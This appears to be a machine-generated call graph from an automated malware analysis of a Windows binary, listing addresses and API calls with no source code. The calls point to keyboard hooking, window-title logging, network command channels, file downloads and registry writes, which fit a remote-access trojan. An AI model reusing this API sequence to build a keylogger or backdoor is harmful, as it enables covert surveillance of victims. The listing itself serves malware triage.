47925->47943 47926->47925 47935 2fad071 47926->47935 47930 2f94243 47929->47930 47931 2f923ce 11 API calls 47930->47931 47932 2f9424e 47931->47932 47933 2f92569 28 API calls 47932->47933 47934 2f941b5 47933->47934 47934->47466 47937 2fad079 47935->47937 47936 2fad0ab 47936->47925 47937->47936 47938 2fad0af 47937->47938 47939 2fad093 47937->47939 47955 2f92725 22 API calls 47938->47955 47945 2fad0e2 47939->47945 47943->47924 47944->47924 47946 2fad0ec __EH_prolog 47945->47946 47956 2f92717 22 API calls 47946->47956 47948 2fad0ff 47957 2fad1ee 11 API calls 47948->47957 47950 2fad125 47951 2fad15d 47950->47951 47958 2f92730 11 API calls 47950->47958 47951->47936 47953 2fad144 47959 2f92712 11 API calls std::_Deallocate 47953->47959 47956->47948 47957->47950 47958->47953 47959->47951 47960->47489 47961->47494 47962->47491 47965 2f932aa 47964->47965 47967 2f932c9 47965->47967 47968 2f928e8 28 API calls 47965->47968 47967->47505 47968->47967 47970 2f951fb 47969->47970 47979 2f95274 47970->47979 47972 2f95208 47972->47508 47974 2f92061 47973->47974 47975 2f923ce 11 API calls 47974->47975 47976 2f9207b 47975->47976 48003 2f9267a 47976->48003 47980 2f95282 47979->47980 47981 2f95288 47980->47981 47982 2f9529e 47980->47982 47990 2f925f0 47981->47990 47983 2f952f5 47982->47983 47984 2f952b6 47982->47984 48000 2f928a4 22 API calls 47983->48000 47989 2f9529c 47984->47989 47999 2f928e8 28 API calls 47984->47999 47989->47972 47991 2f92888 22 API calls 47990->47991 47992 2f92602 47991->47992 47993 2f92629 47992->47993 47994 2f92672 47992->47994 47998 2f9263b 47993->47998 48001 2f928e8 28 API calls 47993->48001 48002 2f928a4 22 API calls 47994->48002 47998->47989 47999->47989 48001->47998 48004 2f9268b 48003->48004 48005 2f923ce 11 API calls 48004->48005 48006 2f9208d 48005->48006 48006->47511 48007->47519 48008->47525 48011 2fab362 48010->48011 48012 2fac055 GetCurrentProcess 48010->48012 48013 2fa35e1 RegOpenKeyExA 48011->48013 48012->48011 48014 2fa360f RegQueryValueExA RegCloseKey 48013->48014 48015 2fa3639 48013->48015 48014->48015 48016 2f92093 28 API calls 48015->48016 48017 2fa364e 48016->48017 48017->47535 48018->47544 48020 2f9b947 48019->48020 48025 2f92252 48020->48025 48022 2f9b952 48029 2f9b967 48022->48029 48024 2f9b961 48024->47554 48026 2f922ac 48025->48026 48027 2f9225c 48025->48027 48026->48022 48027->48026 48036 2f92779 11 API calls std::_Deallocate 48027->48036 48030 2f9b9a1 48029->48030 48031 2f9b973 48029->48031 48048 2f928a4 22 API calls 48030->48048 48037 2f927e6 48031->48037 48035 2f9b97d 48035->48024 48036->48026 48038 2f927ef 48037->48038 48039 2f927f9 48038->48039 48040 2f92851 48038->48040 48043 2f92802 48039->48043 48045 2f92815 48039->48045 48050 2f928a4 22 API calls 48040->48050 48049 2f92aea 28 API calls __EH_prolog 48043->48049 48046 2f92813 48045->48046 48047 2f92252 11 API calls 48045->48047 48046->48035 48047->48046 48049->48046 48051->47563 48053 2f92347 48052->48053 48054 2f92252 11 API calls 48053->48054 48055 2f923c7 48054->48055 48055->47563 48057 2f924f9 48056->48057 48058 2f9250a 28 API calls 48057->48058 48059 2f920b1 48058->48059 48059->47183 48076 2fcba8a 48060->48076 48062 2fcaed0 48063 2fca837 __cftof 35 API calls 48062->48063 48069 2fcaedc 48063->48069 48064 2fcaeaa 48081 2fd062d 20 API calls __dosmaperr 48064->48081 48065 2fcae95 48065->48062 48065->48064 48067 2fcaeaf __cftof 48065->48067 48067->47592 48070 2fcaf0b 48069->48070 48082 2fcbacf 39 API calls __Toupper 48069->48082 48073 2fcaf77 48070->48073 48083 2fcba36 20 API calls 2 library calls 48070->48083 48084 2fcba36 20 API calls 2 library calls 48073->48084 48074 2fcb03e _swprintf 48074->48067 48085 2fd062d 20 API calls __dosmaperr 48074->48085 48077 2fcba8f 48076->48077 48078 2fcbaa2 48076->48078 48086 2fd062d 20 API calls __dosmaperr 48077->48086 48078->48065 48080 2fcba94 __cftof 48080->48065 48081->48067 48082->48069 48083->48073 48084->48074 48085->48067 48086->48080 48093 2f91fb0 48087->48093 48089 2f92f1e 48090 2f92055 11 API calls 48089->48090 48091 2f92f2d 48090->48091 48091->47606 48092->47609 48094 2f925f0 28 API calls 48093->48094 48095 2f91fbd 48094->48095 48095->48089 48097 2f9a162 48096->48097 48098 2fa3584 3 API calls 48097->48098 48099 2f9a169 48098->48099 48100 2f9a17d 48099->48100 48101 2f9a197 48099->48101 48103 2f99ed6 48100->48103 48104 2f9a182 48100->48104 48117 2f99097 48101->48117 48103->47234 48106 2f99097 28 API calls 48104->48106 48107 2f9a190 48106->48107 48145 2f9a268 29 API calls 48107->48145 48110 2f9a195 48110->48103 48111->47633 48293 2f93222 48112->48293 48114 2f93022 48297 2f93262 48114->48297 48118 2f990ad 48117->48118 48119 2f92252 11 API calls 48118->48119 48120 2f990c7 48119->48120 48146 2f94267 48120->48146 48122 2f990d5 48123 2f9a1b4 48122->48123 48158 2f9b927 48123->48158 48126 2f9a1dd 48129 2f92093 28 API calls 48126->48129 48127 2f9a205 48128 2f92093 28 API calls 48127->48128 48130 2f9a210 48128->48130 48131 2f9a1e7 48129->48131 48132 2f92093 28 API calls 48130->48132 48133 2fabcef 28 API calls 48131->48133 48135 2f9a21f 48132->48135 48134 2f9a1f5 48133->48134 48162 2f9b19f 31 API calls _Yarn 48134->48162 48137 2fab580 79 API calls 48135->48137 48139 2f9a224 CreateThread 48137->48139 48138 2f9a1fc 48140 2f91fd8 11 API calls 48138->48140 48141 2f9a24b CreateThread 48139->48141 48142 2f9a23f CreateThread 48139->48142 48170 2f9a2b8 48139->48170 48140->48127 48143 2f91f09 11 API calls 48141->48143 48167 2f9a2c4 48141->48167 48142->48141 48164 2f9a2a2 48142->48164 48144 2f9a25f 48143->48144 48144->48103 48145->48110 48292 2f9a2ae 162 API calls 48145->48292 48147 2f92888 22 API calls 48146->48147 48148 2f9427b 48147->48148 48149 2f94290 48148->48149 48150 2f942a5 48148->48150 48156 2f942df 22 API calls 48149->48156 48152 2f927e6 28 API calls 48150->48152 48154 2f942a3 48152->48154 48153 2f94299 48157 2f92c48 22 API calls 48153->48157 48154->48122 48156->48153 48157->48154 48159 2f9a1d2 48158->48159 48160 2f9b930 48158->48160 48159->48126 48159->48127 48163 2f9b9a7 28 API calls 48160->48163 48162->48138 48163->48159 48173 2f9a2f3 48164->48173 48203 2f9ad11 48167->48203 48245 2f9a761 48170->48245 48174 2f9a30c GetModuleHandleA SetWindowsHookExA 48173->48174 48175 2f9a36e GetMessageA 48173->48175 48174->48175 48177 2f9a328 GetLastError 48174->48177 48176 2f9a380 TranslateMessage DispatchMessageA 48175->48176 48187 2f9a2ab 48175->48187 48176->48175 48176->48187 48188 2fabc1f 48177->48188 48194 2fd1ed1 48188->48194 48191 2f92093 28 API calls 48192 2f9a339 48191->48192 48193 2f952fd 28 API calls 48192->48193 48195 2fd1edd 48194->48195 48198 2fd1ccd 48195->48198 48197 2fabc43 48197->48191 48199 2fd1ce4 48198->48199 48201 2fd1d1b __cftof 48199->48201 48202 2fd062d 20 API calls __dosmaperr 48199->48202 48201->48197 48202->48201 48210 2f9ad1f 48203->48210 48204 2f9a2cd 48205 2f9ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48207 2f9b93f 28 API calls 48205->48207 48207->48210 48210->48204 48210->48205 48212 2fabb77 GetTickCount 48210->48212 48213 2f9adbf GetWindowTextW 48210->48213 48215 2f9b927 28 API calls 48210->48215 48216 2f9af17 48210->48216 48218 2f9ae84 Sleep 48210->48218 48219 2fd1ed1 20 API calls 48210->48219 48221 2f92093 28 API calls 48210->48221 48225 2f93014 28 API calls 48210->48225 48226 2f96383 28 API calls 48210->48226 48228 2f9ae0c 48210->48228 48229 2fabcef 28 API calls 48210->48229 48230 2f91f09 11 API calls 48210->48230 48231 2f9a671 29 API calls 48210->48231 48232 2f91fd8 11 API calls 48210->48232 48233 2fc445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48210->48233 48234 2f91f86 48210->48234 48238 2fc4801 23 API calls __onexit 48210->48238 48239 2fc441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48210->48239 48240 2f9907f 28 API calls 48210->48240 48242 2f9b9b7 28 API calls 48210->48242 48243 2f9b783 40 API calls 2 library calls 48210->48243 48244 2f952fd 28 API calls 48210->48244 48212->48210 48213->48210 48215->48210 48217 2f91f09 11 API calls 48216->48217 48217->48204 48218->48210 48219->48210 48221->48210 48224 2f99097 28 API calls 48224->48228 48225->48210 48226->48210 48228->48210 48228->48224 48241 2f9b19f 31 API calls _Yarn 48228->48241 48229->48210 48230->48210 48231->48210 48232->48210 48235 2f91f8e 48234->48235 48236 2f92252 11 API calls 48235->48236 48237 2f91f99 48236->48237 48237->48210 48238->48210 48239->48210 48240->48210 48241->48228 48242->48210 48243->48210 48246 2f9a776 Sleep 48245->48246 48266 2f9a6b0 48246->48266 48248 2f9a2c1 48249 2f9a7b6 CreateDirectoryW 48253 2f9a788 48249->48253 48250 2f9a7c7 GetFileAttributesW 48250->48253 48251 2f9a7de SetFileAttributesW 48251->48253 48252 2f9a829 48254 2f920df 11 API calls 48252->48254 48256 2f9a858 PathFileExistsW 48252->48256 48258 2f920b7 28 API calls 48252->48258 48260 2f9a961 SetFileAttributesW 48252->48260 48261 2f91fe2 28 API calls 48252->48261 48262 2f96e13 28 API calls 48252->48262 48263 2f91fd8 11 API calls 48252->48263 48265 2f91fd8 11 API calls 48252->48265 48289 2fac516 32 API calls 48252->48289 48290 2fac583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48252->48290 48253->48246 48253->48248 48253->48249 48253->48250 48253->48251 48253->48252 48257 2f91e65 22 API calls 48253->48257 48279 2fac482 48253->48279 48254->48252 48256->48252 48257->48253 48258->48252 48260->48253 48261->48252 48262->48252 48263->48252 48265->48253 48267 2f9a75d 48266->48267 48269 2f9a6c6 48266->48269 48267->48253 48268 2f9a6e5 CreateFileW 48268->48269 48270 2f9a6f3 GetFileSize 48268->48270 48269->48268 48271 2f9a728 CloseHandle 48269->48271 48272 2f9a73a 48269->48272 48273 2f9a71d Sleep 48269->48273 48274 2f9a716 48269->48274 48270->48269 48270->48271 48271->48269 48272->48267 48276 2f99097 28 API calls 48272->48276 48273->48271 48291 2f9b117 83 API calls 48274->48291 48277 2f9a756 48276->48277 48278 2f9a1b4 123 API calls 48277->48278 48278->48267 48280 2fac495 CreateFileW 48279->48280 48282 2fac4ce 48280->48282 48283 2fac4d2 48280->48283 48282->48253 48284 2fac4d9 SetFilePointer 48283->48284 48285 2fac4f2 WriteFile 48283->48285 48284->48285 48288 2fac4e9 CloseHandle 48284->48288 48286 2fac507 CloseHandle 48285->48286 48287 2fac505 48285->48287 48286->48282 48287->48286 48288->48282 48289->48252 48290->48252 48291->48273 48294 2f9322e 48293->48294 48303 2f93618 48294->48303 48296 2f9323b 48296->48114 48298 2f9326e 48297->48298 48299 2f92252 11 API calls 48298->48299 48300 2f93288 48299->48300 48301 2f92336 11 API calls 48300->48301 48302 2f93031 48301->48302 48302->47638 48304 2f93626 48303->48304 48305 2f93644 48304->48305 48306 2f9362c 48304->48306 48308 2f9365c 48305->48308 48309 2f9369e 48305->48309 48314 2f936a6 28 API calls 48306->48314 48311 2f927e6 28 API calls 48308->48311 48313 2f93642 48308->48313 48315 2f928a4 22 API calls 48309->48315 48311->48313 48313->48296 48314->48313 48317 2f94186 48316->48317 48318 2f92252 11 API calls 48317->48318 48319 2f94191 48318->48319 48327 2f941bc 48319->48327 48322 2f942fc 48338 2f94353 48322->48338 48324 2f9430a 48325 2f93262 11 API calls 48324->48325 48326 2f94319 48325->48326 48326->47647 48328 2f941c8 48327->48328 48331 2f941d9 48328->48331 48330 2f9419c 48330->48322 48332 2f941e9 48331->48332 48333 2f941ef 48332->48333 48334 2f94206 48332->48334 48336 2f94267 28 API calls 48333->48336 48335 2f927e6 28 API calls 48334->48335 48337 2f94204 48335->48337 48336->48337 48337->48330 48339 2f9435f 48338->48339 48342 2f94371 48339->48342 48341 2f9436d 48341->48324 48343 2f9437f 48342->48343 48344 2f9439e 48343->48344 48345 2f94385 48343->48345 48346 2f92888 22 API calls 48344->48346 48408 2f934e6 28 API calls 48345->48408 48347 2f943a6 48346->48347 48349 2f94419 48347->48349 48350 2f943bf 48347->48350 48409 2f928a4 22 API calls 48349->48409 48352 2f927e6 28 API calls 48350->48352 48361 2f9439c 48350->48361 48352->48361 48361->48341 48408->48361 48416 2fcab1a 48410->48416 48414 2fa38ca RegSetValueExA RegCloseKey 48413->48414 48415 2fa38f4 48413->48415 48414->48415 48415->47666 48419 2fcaa9b 48416->48419 48418 2f9170d 48418->47664 48420 2fcaabe 48419->48420 48421 2fcaaaa 48419->48421 48424 2fcaaaf __alldvrm __cftof 48420->48424 48426 2fd89d7 11 API calls 2 library calls 48420->48426 48425 2fd062d 20 API calls __dosmaperr 48421->48425 48424->48418 48425->48424 48426->48424 48430 2fab98a _Yarn ___scrt_get_show_window_mode 48427->48430 48428 2f92093 28 API calls 48429 2fa4f84 48428->48429 48429->47672 48430->48428 48431->47689 48433 2fa4f3d getaddrinfo WSASetLastError 48432->48433 48434 2fa4f33 48432->48434 48433->47739 48574 2fa4dc1 29 API calls ___std_exception_copy 48434->48574 48436 2fa4f38 48436->48433 48438 2f94839 48437->48438 48439 2f94846 socket 48437->48439 48575 2f9489e WSAStartup 48438->48575 48441 2f94860 CreateEventW 48439->48441 48442 2f94842 48439->48442 48441->47739 48442->47739 48443 2f9483e 48443->48439 48443->48442 48445 2f94fea 48444->48445 48446 2f94f65 48444->48446 48445->47739 48447 2f94f6e 48446->48447 48448 2f94fc0 CreateEventA CreateThread 48446->48448 48449 2f94f7d GetLocalTime 48446->48449 48447->48448 48448->48445 48577 2f95150 48448->48577 48450 2fabc1f 28 API calls 48449->48450 48451 2f94f91 48450->48451 48576 2f952fd 28 API calls 48451->48576 48460 2f94a1b 48459->48460 48461 2f948ee 48459->48461 48462 2f9497e 48460->48462 48463 2f94a21 WSAGetLastError 48460->48463 48461->48462 48464 2f94923 48461->48464 48469 2f9531e 28 API calls 48461->48469 48462->47739 48463->48462 48465 2f94a31 48463->48465 48581 2fb0cf1 27 API calls 48464->48581 48466 2f94932 48465->48466 48467 2f94a36 48465->48467 48476 2f92093 28 API calls 48466->48476 48586 2facb72 30 API calls 48467->48586 48472 2f9490f 48469->48472 48471 2f9492b 48471->48466 48475 2f94941 48471->48475 48473 2f92093 28 API calls 48472->48473 48477 2f9491e 48473->48477 48474 2f94a40 48587 2f952fd 28 API calls 48474->48587 48485 2f94950 48475->48485 48486 2f94987 48475->48486 48479 2f94a80 48476->48479 48480 2fab580 79 API calls 48477->48480 48482 2f92093 28 API calls 48479->48482 48480->48464 48483 2f94a8f 48482->48483 48487 2fab580 79 API calls 48483->48487 48490 2f92093 28 API calls 48485->48490 48583 2fb1ad1 53 API calls 48486->48583 48487->48462 48493 2f9495f 48490->48493 48492 2f9498f 48495 2f949c4 48492->48495 48496 2f94994 48492->48496 48497 2f92093 28 API calls 48493->48497 48585 2fb0e97 28 API calls 48495->48585 48500 2f92093 28 API calls 48496->48500 48501 2f9496e 48497->48501 48504 2f949a3 48500->48504 48502 2fab580 79 API calls 48501->48502 48505 2f94973 48502->48505 48503 2f949cc 48506 2f949f9 CreateEventW CreateEventW 48503->48506 48508 2f92093 28 API calls 48503->48508 48507 2f92093 28 API calls 48504->48507 48582 2fae7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48505->48582 48506->48462 48509 2f949b2 48507->48509 48511 2f949e2 48508->48511 48512 2fab580 79 API calls 48509->48512 48513 2f92093 28 API calls 48511->48513 48514 2f949b7 48512->48514 48515 2f949f1 48513->48515 48584 2fb1143 51 API calls 48514->48584 48517 2fab580 79 API calls 48515->48517 48518 2f949f6 48517->48518 48518->48506 48588 2fab847 GlobalMemoryStatusEx 48519->48588 48521 2fab886 48521->47739 48589 2fa45bb 48522->48589 48526 2f9dde0 48525->48526 48527 2fa353a 3 API calls 48526->48527 48529 2f9dde7 48527->48529 48528 2f9ddff 48528->47739 48529->48528 48530 2fa3584 3 API calls 48529->48530 48530->48528 48532 2f920b7 28 API calls 48531->48532 48533 2fabce8 48532->48533 48533->47739 48535 2fabdbc 48534->48535 48536 2f920b7 28 API calls 48535->48536 48537 2fabdce 48536->48537 48537->47739 48539 2fabb8d GetTickCount 48538->48539 48539->47755 48541 2fc6f10 ___scrt_get_show_window_mode 48540->48541 48542 2fabb46 GetForegroundWindow GetWindowTextW 48541->48542 48543 2f9417e 28 API calls 48542->48543 48544 2fabb70 48543->48544 48544->47755 48546 2f92093 28 API calls 48545->48546 48547 2f9f931 48546->48547 48547->47755 48548->47755 48550 2f920df 11 API calls 48549->48550 48551 2f94c27 48550->48551 48552 2f920df 11 API calls 48551->48552 48554 2f94c30 48552->48554 48553 2fcbda0 _Yarn 21 API calls 48553->48554 48554->48553 48556 2f94c96 48554->48556 48557 2f920b7 28 API calls 48554->48557 48559 2f91fe2 28 API calls 48554->48559 48562 2f91fd8 11 API calls 48554->48562 48618 2f94cc3 48554->48618 48630 2f94b96 56 API calls 48554->48630 48556->48554 48558 2f94ca1 48556->48558 48557->48554 48631 2f94e26 98 API calls 48558->48631 48559->48554 48561 2f94ca8 48563 2f91fd8 11 API calls 48561->48563 48562->48554 48564 2f94cb1 48563->48564 48565 2f91fd8 11 API calls 48564->48565 48566 2f94cba 48565->48566 48566->47715 48568->47739 48569->47715 48571->47755 48572->47715 48573->47715 48574->48436 48575->48443 48580 2f9515c 101 API calls 48577->48580 48579 2f95159 48580->48579 48581->48471 48582->48462 48583->48492 48584->48505 48585->48503 48586->48474 48588->48521 48592 2fa458e 48589->48592 48593 2fa45a3 ___scrt_initialize_default_local_stdio_options 48592->48593 48596 2fcf7ed 48593->48596 48599 2fcc540 48596->48599 48600 2fcc568 48599->48600 48601 2fcc580 48599->48601 48614 2fd062d 20 API calls __dosmaperr 48600->48614 48601->48600 48603 2fcc588 48601->48603 48604 2fca837 __cftof 35 API calls 48603->48604 48605 2fcc598 48604->48605 48615 2fcccc6 20 API calls 2 library calls 48605->48615 48606 2fcc56d __cftof 48608 2fc502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 48606->48608 48610 2fa45b1 48608->48610 48609 2fcc610 48616 2fcd334 50 API calls 3 library calls 48609->48616 48610->47739 48613 2fcc61b 48617 2fccd30 20 API calls _free 48613->48617 48614->48606 48615->48609 48616->48613 48617->48606 48619 2f920df 11 API calls 48618->48619 48629 2f94cde 48619->48629 48620 2f94e13 48621 2f91fd8 11 API calls 48620->48621 48622 2f94e1c 48621->48622 48622->48556 48623 2f941a2 28 API calls 48623->48629 48624 2f91fe2 28 API calls 48624->48629 48625 2f91fd8 11 API calls 48625->48629 48626 2f920f6 28 API calls 48626->48629 48627 2f91fc0 28 API calls 48628 2f94dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48627->48628 48628->48629 48632 2fa5b25 48628->48632 48629->48620 48629->48623 48629->48624 48629->48625 48629->48626 48629->48627 48630->48554 48631->48561 48633 2f920f6 28 API calls 48632->48633 48634 2fa5b47 SetEvent 48633->48634 48635 2fa5b5c 48634->48635 48636 2f941a2 28 API calls 48635->48636 48637 2fa5b76 48636->48637 48638 2f920f6 28 API calls 48637->48638 48639 2fa5b86 48638->48639 48640 2f920f6 28 API calls 48639->48640 48641 2fa5b98 48640->48641 48642 2fabeac 28 API calls 48641->48642 48643 2fa5ba1 48642->48643 48644 2fa70c4 48643->48644 48645 2fa5d6a 48643->48645 48646 2fa5bc1 GetTickCount 48643->48646 48647 2f91e8d 11 API calls 48644->48647 48645->48644 48706 2fa5d20 48645->48706 48648 2fabc1f 28 API calls 48646->48648 48649 2fa70cd 48647->48649 48651 2fa5bd2 48648->48651 48652 2f91fd8 11 API calls 48649->48652 48653 2fabb77 GetTickCount 48651->48653 48654 2fa70d9 48652->48654 48656 2fa5bde 48653->48656 48657 2f91fd8 11 API calls 48654->48657 48655 2fa5d04 48655->48644 48658 2fabc1f 28 API calls 48656->48658 48659 2fa70e5 48657->48659 48660 2fa5be9 48658->48660 48661 2fabb27 30 API calls 48660->48661 48662 2fa5bf7 48661->48662 48663 2fabdaf 28 API calls 48662->48663 48664 2fa5c05 48663->48664 48665 2f91e65 22 API calls 48664->48665 48666 2fa5c13 48665->48666 48711 2f92f31 28 API calls 48666->48711 48668 2fa5c21 48712 2f92ea1 28 API calls 48668->48712 48670 2fa5c30 48671 2f92f10 28 API calls 48670->48671 48672 2fa5c3f 48671->48672 48713 2f92ea1 28 API calls 48672->48713 48674 2fa5c4e 48675 2f92f10 28 API calls 48674->48675 48676 2fa5c5a 48675->48676 48714 2f92ea1 28 API calls 48676->48714 48678 2fa5c64 48715 2f94aa1 60 API calls _Yarn 48678->48715 48680 2fa5c73 48681 2f91fd8 11 API calls 48680->48681 48682 2fa5c7c 48681->48682 48683 2f91fd8 11 API calls 48682->48683 48684 2fa5c88 48683->48684 48685 2f91fd8 11 API calls 48684->48685 48686 2fa5c94 48685->48686 48687 2f91fd8 11 API calls 48686->48687 48688 2fa5ca0 48687->48688 48689 2f91fd8 11 API calls 48688->48689 48690 2fa5cac 48689->48690 48691 2f91fd8 11 API calls 48690->48691 48692 2fa5cb8 48691->48692 48693 2f91f09 11 API calls 48692->48693 48694 2fa5cc1 48693->48694 48695 2f91fd8 11 API calls 48694->48695 48696 2fa5cca 48695->48696 48697 2f91fd8 11 API calls 48696->48697 48698 2fa5cd3 48697->48698 48699 2f91e65 22 API calls 48698->48699 48700 2fa5cde 48699->48700 48701 2fcbb2c 39 API calls 48700->48701 48702 2fa5ceb 48701->48702 48703 2fa5cf0 48702->48703 48704 2fa5d16 48702->48704 48707 2fa5d09 48703->48707 48708 2fa5cfe 48703->48708 48705 2f91e65 22 API calls 48704->48705 48705->48706 48706->48644 48717 2f950e4 83 API calls 48706->48717 48710 2f94f51 104 API calls 48707->48710 48716 2f94ff4 81 API calls 48708->48716 48710->48655 48711->48668 48712->48670 48713->48674 48714->48678 48715->48680 48716->48655 48717->48655 48719->47792 48720->47816 48721->47818 48722->47806 48723->47810 48724->47817 48725->47851 48730 2f9f7fd 48728->48730 48729 2fa3584 3 API calls 48729->48730 48730->48729 48732 2f9f8a1 48730->48732 48733 2f9f891 Sleep 48730->48733 48750 2f9f82f 48730->48750 48731 2f99097 28 API calls 48731->48750 48734 2f99097 28 API calls 48732->48734 48733->48730 48737 2f9f8ac 48734->48737 48736 2fabcef 28 API calls 48736->48750 48738 2fabcef 28 API calls 48737->48738 48739 2f9f8b8 48738->48739 48763 2fa384f 14 API calls 48739->48763 48742 2f91f09 11 API calls 48742->48750 48743 2f9f8cb 48744 2f91f09 11 API calls 48743->48744 48746 2f9f8d7 48744->48746 48745 2f92093 28 API calls 48745->48750 48747 2f92093 28 API calls 48746->48747 48748 2f9f8e8 48747->48748 48751 2fa37aa 14 API calls 48748->48751 48749 2fa37aa 14 API calls 48749->48750 48750->48731 48750->48733 48750->48736 48750->48742 48750->48745 48750->48749 48761 2f9d0d1 111 API calls ___scrt_get_show_window_mode 48750->48761 48762 2fa384f 14 API calls 48750->48762 48752 2f9f8fb 48751->48752 48764 2fa288b TerminateProcess WaitForSingleObject 48752->48764 48754 2f9f903 ExitProcess 48765 2fa2829 61 API calls 48755->48765 48762->48750 48763->48743 48764->48754 48766 2fbf97e 48767 2fbf989 48766->48767 48768 2fbf99d 48767->48768 48770 2fc2f7f 48767->48770 48771 2fc2f8e 48770->48771 48772 2fc2f8a 48770->48772 48774 2fd0f5d 48771->48774 48772->48768 48775 2fd6206 48774->48775 48776 2fd621e 48775->48776 48777 2fd6213 48775->48777 48778 2fd6226 48776->48778 48785 2fd622f ___crtLCMapStringA 48776->48785 48779 2fd61b8 ___crtLCMapStringA 21 API calls 48777->48779 48780 2fd6802 _free 20 API calls 48778->48780 48783 2fd621b 48779->48783 48780->48783 48781 2fd6259 RtlReAllocateHeap 48781->48783 48781->48785 48782 2fd6234 48787 2fd062d 20 API calls __dosmaperr 48782->48787 48783->48772 48785->48781 48785->48782 48788 2fd3001 7 API calls 2 library calls 48785->48788 48787->48783 48788->48785 48789 2f9a2df 48792 2f9a3a2 48789->48792 48791 2f9a2f0 48793 2f9a3bf 48792->48793 48794 2f9a402 CallNextHookEx 48792->48794 48795 2f9a3eb 48793->48795 48796 2f9a3ca 48793->48796 48794->48791 48805 2f9b25c 48795->48805 48797 2f9a3dd 48796->48797 48798 2f9a3cf 48796->48798 48863 2f9b6db 30 API calls 48797->48863 48798->48794 48862 2f9b681 38 API calls 48798->48862 48803 2f9a3db 48803->48794 48807 2f9b26b 48805->48807 48806 2f92093 28 API calls 48809 2f9b4f8 48806->48809 48807->48806 48808 2f9a3f7 48807->48808 48808->48794 48811 2f9b528 48808->48811 48864 2f9a64c 29 API calls 48809->48864 48812 2f9b66b 48811->48812 48813 2f9b542 48811->48813 48865 2f9a41b 48812->48865 48814 2f9b548 48813->48814 48815 2f9b5c6 48813->48815 48821 2f92093 28 API calls 48814->48821 48856 2f9b669 48814->48856 48818 2f92093 28 API calls 48815->48818 48820 2f9b5d4 48818->48820 48822 2f92093 28 API calls 48820->48822 48823 2f9b570 48821->48823 48824 2f9b5e2 48822->48824 48875 2fcfd16 43 API calls 48823->48875 48826 2fabcef 28 API calls 48824->48826 48828 2f9b5f2 48826->48828 48827 2f9b57e 48829 2f92093 28 API calls 48827->48829 48879 2f9b749 31 API calls 48828->48879 48831 2f9b58e 48829->48831 48876 2f991d8 28 API calls 48831->48876 48832 2f9b605 48834 2fabcef 28 API calls 48832->48834 48836 2f9b613 48834->48836 48835 2f9b599 48877 2f92ea1 28 API calls 48835->48877 48880 2f92fa5 28 API calls 48836->48880 48839 2f9b61e 48881 2f92fa5 28 API calls 48839->48881 48840 2f9b5a3 48878 2f9a64c 29 API calls 48840->48878 48843 2f9b628 48882 2f9a671 29 API calls 48843->48882 48844 2f9b5ab 48845 2f91fd8 11 API calls 48844->48845 48847 2f9b5b4 48845->48847 48849 2f91fd8 11 API calls 48847->48849 48848 2f9b630 48850 2f91f09 11 API calls 48848->48850 48851 2f9b5bd 48849->48851 48852 2f9b639 48850->48852 48854 2f91fd8 11 API calls 48851->48854 48853 2f91f09 11 API calls 48852->48853 48855 2f9b642 48853->48855 48854->48856 48857 2f91f09 11 API calls 48855->48857 48856->48794 48858 2f9b64b 48857->48858 48859 2f91f09 11 API calls 48858->48859 48860 2f9b657 48859->48860 48861 2f91fd8 11 API calls 48860->48861 48861->48851 48862->48803 48863->48803 48864->48808 48866 2fc6f10 ___scrt_get_show_window_mode 48865->48866 48867 2f9a43c 6 API calls 48866->48867 48868 2f9a511 48867->48868 48871 2f9a4a3 ___scrt_get_show_window_mode 48867->48871 48869 2f9a521 ToUnicodeEx 48868->48869 48869->48869 48870 2f9a508 48869->48870 48872 2f9417e 28 API calls 48870->48872 48871->48870 48873 2f9a4df ToUnicodeEx 48871->48873 48874 2f9a550 48872->48874 48873->48870 48883 2f9a671 29 API calls 48874->48883 48875->48827 48876->48835 48877->48840 48878->48844 48879->48832 48880->48839 48881->48843 48882->48848 48883->48856 48884 2fb6c6d 48890 2fb6d42 recv 48884->48890 48891 2fb6cdc 48896 2fb6d59 send 48891->48896 48897 2f9165e 48898 2f91666 48897->48898 48900 2f91669 48897->48900 48899 2f916a8 48901 2fc455e new 22 API calls 48899->48901 48900->48899 48902 2f91696 48900->48902 48903 2f9169c 48901->48903 48904 2fc455e new 22 API calls 48902->48904 48904->48903 48905 2fa5d41 48920 2fab411 48905->48920 48907 2fa5d4a 48908 2f920f6 28 API calls 48907->48908 48909 2fa5d59 48908->48909 48931 2f94aa1 60 API calls _Yarn 48909->48931 48911 2fa5d65 48912 2fa70c4 48911->48912 48913 2f91fd8 11 API calls 48911->48913 48914 2f91e8d 11 API calls 48912->48914 48913->48912 48915 2fa70cd 48914->48915 48916 2f91fd8 11 API calls 48915->48916 48917 2fa70d9 48916->48917 48918 2f91fd8 11 API calls 48917->48918 48919 2fa70e5 48918->48919 48921 2f920df 11 API calls 48920->48921 48922 2fab41f 48921->48922 48923 2fcbda0 _Yarn 21 API calls 48922->48923 48924 2fab42f InternetOpenW InternetOpenUrlW 48923->48924 48925 2fab456 InternetReadFile 48924->48925 48929 2fab479 48925->48929 48926 2fab4a6 InternetCloseHandle InternetCloseHandle 48928 2fab4b8 48926->48928 48927 2f920b7 28 API calls 48927->48929 48928->48907 48929->48925 48929->48926 48929->48927 48930 2f91fd8 11 API calls 48929->48930 48930->48929 48931->48911 48932 2fb6a77 48933 2fb6a8c 48932->48933 48944 2fb6b1e 48932->48944 48934 2fb6b4e 48933->48934 48935 2fb6bae 48933->48935 48936 2fb6bd5 48933->48936 48937 2fb6ad9 48933->48937 48940 2fb6b83 48933->48940 48933->48944 48946 2fb6b0e 48933->48946 48960 2fb4f6e 48 API calls _Yarn 48933->48960 48934->48940 48934->48944 48963 2fafbfd 51 API calls 48934->48963 48935->48936 48935->48944 48948 2fb5b72 48935->48948 48936->48944 48965 2fb61e6 28 API calls 48936->48965 48937->48944 48937->48946 48961 2fafbfd 51 API calls 48937->48961 48940->48935 48964 2fb5781 21 API calls 48940->48964 48946->48934 48946->48944 48962 2fb4f6e 48 API calls _Yarn 48946->48962 48950 2fb5b91 ___scrt_get_show_window_mode 48948->48950 48949 2fb5ba5 48956 2fb5bae 48949->48956 48957 2fb5bc5 48949->48957 48969 2fadaf0 48 API calls 48949->48969 48952 